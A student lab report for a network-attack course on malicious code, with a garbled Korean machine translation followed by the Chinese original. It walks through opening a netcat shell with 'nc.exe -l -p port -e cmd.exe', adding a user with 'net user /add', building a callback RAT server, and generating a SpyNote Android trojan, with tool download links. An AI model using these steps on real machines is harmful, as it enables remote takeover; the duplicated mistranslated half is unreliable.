네트워크 대결 기술 실험 보고서 IV

중국 인민 공안 대학

중국인 '  공안 대학

 

네트워크 전쟁 기술

실험 보고서

 

실험 4

악성 코드 기술

 

 

 

학생 이름

유 노래하는 경우 

2,017 

지구 팀

네트워크 연구 수업 

강사

 귀하의 의견

 

 

정보 및 네트워크 보안 기술 대학

2,019 니안 12 유에 23


실험 작업 마스터

20는 18가 -20 . (19) 학기   

첫째, 실험의 목적

1 . 독자가 이해할 수 있도록하는 트로이 목마에 대한 연습, 마스터 트로이 목마 확산 및 운영의 메커니즘을 통해, 수동으로 트로이 목마를 삭제, 트로이 목마 검사는 트로이 목마의 보안 의식을 강화, 트로이 목마 방어 관련 지식을 배우고, 이해 및 트로이 목마 능력을 제거합니다.

 

2 . 이해하고 잘 알고있는 일반적인 네트워크 공격 도구, 트로이 목마의 기본 기능 ;

3 . 교과 과정의 지식과 실용적인 응용 프로그램의 통합의 목적.

둘째, 실험적인 요구 사항

1 . 조심스럽게 각 실험의 내용을 읽고, 우리는 제목을 캡처하는 명확한 스크린 샷과 주석을 스크린 샷과 설명해야합니다.

2 . 문서의 요구 사항은 명확하게 구조화 , 그래픽 표현 정확한 라벨 사양. 추론은 , 객관적 합리적이고 논리적이었다.

3 . 소프트웨어 도구를 사용할 수 있습니다 노스 캐롤라이나 , MSF는 등등과 .

4 . 실험 후, 전자 문서를 보관합니다.

, 실험 절차

1 . 준비된

실험을 설명해야하기 전에 사전에 실험 준비, 실험, 테스트의 목적을 이해하고 요구 사항 및 시험 내용 , 익숙 하고 준비가 좋은 실험과 소프트웨어 도구를 사전에 요구 사항 및 시험 내용에 따라이 실험 수행하는 내용을 준비 .

2 . 실험 환경

설명 실험에 사용 된 하드웨어 및 소프트웨어 환경 (를 포함하여 다양한 소프트웨어 도구) ;

부팅 소프트웨어 시작 에 Office2003 또는 2007 , 브라우저, 암호화 및 암호 해독 소프트웨어를 .

3 . 실험

1 ) 시스템을 시작하고 시작 도구의 소프트웨어 환경을.

2 ) 소프트웨어 도구를 달성하기 위해 실험 내용.

4 . 실험 보고서

테스트 보고서 형식의 표준 요구 사항에 따라 쓰기 실험실보고합니다. 템플릿에 따라 형식으로 작성하는 문서 시험 보고서 문서에 포함을 서면 형식의 규정에 따라 작성된 문서 양식은 그래픽 테이블 일러스트를 가지고 있다고 말할 수 있어야합니다.

 

노스 캐롤라이나 제어 컴퓨터를 사용하는 작업

 

 netcat을 세이버의 네트워크와는 그의 소프트웨어는 이제 다스의 크기로 압축되어 있기 때문에 작고 린과 강력한 기능, 그것은 작고 마른하게 말했다 KB 하지만, 기능의 감소없이.

 

실험 절차는 서로의 완료와 두 학생이 필요합니다

 

노스 캐롤라이나 제어 컴퓨터를 사용하는 작업

 

 세이버의 네트워크와 netcat을, 그의 소프트웨어는 이제 수십 KB의 크기,하지만 기능의 감소없이 압축되어 있기 때문에 작고 린과 강력한 기능, 그것은 작고 마른하게 말했다.

 

실험 절차는 서로의 완료와 두 학생이 필요합니다

 

단계 :

 

   다음 기계 (학생 A) 명령의 피해자를 입력 : nc.exe -l -p 포트 -e cmd.exe를 청취 모드로 들어갑니다

 

두 번째 단계는 : 다음 쉘을, 다음 명령은 공격자의 컴퓨터 (학생 B) :. 노스 캐롤라이나의 IP 포트 // victim_IP 연결을 입력합니다. (스크린 필요)

 

 

 

 

3 단계 :

 

    쉘에서 그물 사용자 이름 암호 / 추가를 사용하여 사용자를 추가하고, 피해자의 컴퓨터를 확인하기 위해 인터넷 사용자의 명령을 사용합니다. (스크린 필요)

 

 

 

 

 당신은 뭔가를 명령 줄을 통해 계속할 수 있습니다.

 

작업이 트로이 목마는 컴퓨터의 사용을 제어

도구 :

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

 

실험 절차는 두 학생이 필요합니다

 

단계 :

 

    공격자의 컴퓨터. (학생 A)는이 트로이 목마 기능과 유사한 V2014.exe 프로그램이나 스타 RAT를 엽니 다.

 

 

 

2 단계 : 팝업 구성 서버에서 메뉴 바의 "생성 된 서비스"로 구성 다시 클릭하여 심지어는 IP 주소 (공격자의 IP)와 포트 번호를 , 그리고 트로이 목마 서버를 생성하기 위해 "생성"버튼을 클릭합니다.

 

 

 

 

3 단계 :

 

다음은 피해자의 컴퓨터에 결과 트로이 목마 실행 파일 복사 및 더블 클릭을 실행합니다. 

 

네 단계 :

 

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

 

 

 

 

 

 

 

会话管理,卸载对方的木马。

 

任务三 Android远控实践  所有过程截图写博客

 相关工具下载:

spynote及环境工具:

https://pan.baidu.com/s/1Olo9znpzADXMYDfi_rnjOg

android模拟器:

https://www.yeshen.com/

http://mumu.163.com/

 

实验步骤:

一、攻击者打开spynote软件,该软件需要先安装.netframework4.0和jdk环境。

 

 

 

 

二、配置并打开监听端口

 

    点击Listen Port,在弹出的对话框中输入端口号,并点击Add按钮,最后点击OK,成功监听本地端口。【本过程选用3210端口,实验过程大家可以自己选择端口】

 

 

 

 

三、配置并生成木马

 

(1)点击Build Client按钮,弹出对话框

 

 

    (4)最后点击Build按钮,在选择框中选择和spynote同处在一个文件夹中Patch-release.apk。

 

 

 

 

    (5)完成后,自动打开APK生成所在的文件夹。

 

 

 

四、将木马安装在Android模拟其中。

 

 

 

 

五、在Spynote中控制手机

 

可以在spynote中看到有一台机器上线,并可以查看其基本信息。

 

 

 

 

在该机器中右键,可以看到可以对该机器进行控制的功能,从中选择4个以上的项目进行实验。

 

中国人民公安大学

Chinese people public security university

 

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

 

学生姓名

宋若禺 

年级

2017 

区队

网络实验班 

指导教师

 高见

 

 

信息技术与网络安全学院

201912月23


实验任务总纲

2018—2019学年   学期

一、实验目的

1通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

 

2.了解并熟悉常用的网络攻击工具,木马的基本功能

3达到巩固课程知识和实际应用的目的。

二、实验要求

1认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3软件工具可使用NCMSF

4.实验结束后,保留电子文档。

、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具)

开机并启动软件office20032007浏览器、加解密软件

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

 

任务一 利用NC控制电脑

 

 NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

 

实验过程需要两个同学相互配合完成:

 

任务一 利用NC控制电脑

 

 NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

 

实验过程需要两个同学相互配合完成:

 

步骤一:

 

   在受害者的机器 (同学A) 输入下面的命令:   nc.exe -l -p port -e cmd.exe   进入监听模式

 

步骤二:   在攻击者的机器.(同学B) 输入下面的命令:   nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

 

 

 

 

步骤三:

 

    在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

 

 

 

 

 可以继续通过命令行做一些事情。

 

任务二 利用木马控制电脑

相关工具:

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

 

实验过程需要两个同学配合:

 

步骤一:

 

    攻击者的机器. (同学A) 打开V2014.exe程序或则star RAT,这两个木马功能类似。

 

 

 

步骤二:   点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

 

 

 

 

步骤三:

 

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

 

步骤四:

 

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

 

 

 

 

 

 

 

会话管理,卸载对方的木马。

 

任务三 Android远控实践  所有过程截图写博客

 相关工具下载:

spynote及环境工具:

https://pan.baidu.com/s/1Olo9znpzADXMYDfi_rnjOg

android模拟器:

https://www.yeshen.com/

http://mumu.163.com/

 

实验步骤:

一、攻击者打开spynote软件,该软件需要先安装.netframework4.0和jdk环境。

 

 

 

 

二、配置并打开监听端口

 

    点击Listen Port,在弹出的对话框中输入端口号,并点击Add按钮,最后点击OK,成功监听本地端口。【本过程选用3210端口,实验过程大家可以自己选择端口】

 

 

 

 

三、配置并生成木马

 

(1)点击Build Client按钮,弹出对话框

 

 

    (4)最后点击Build按钮,在选择框中选择和spynote同处在一个文件夹中Patch-release.apk。

 

 

 

 

    (5)完成后,自动打开APK生成所在的文件夹。

 

 

 

四、将木马安装在Android模拟其中。

 

 

 

 

五、在Spynote中控制手机

 

可以在spynote中看到有一台机器上线,并可以查看其基本信息。

 

 

 

 

在该机器中右键,可以看到可以对该机器进行控制的功能,从中选择4个以上的项目进行实验。

 

추천

출처www.cnblogs.com/p201721210007/p/12082135.html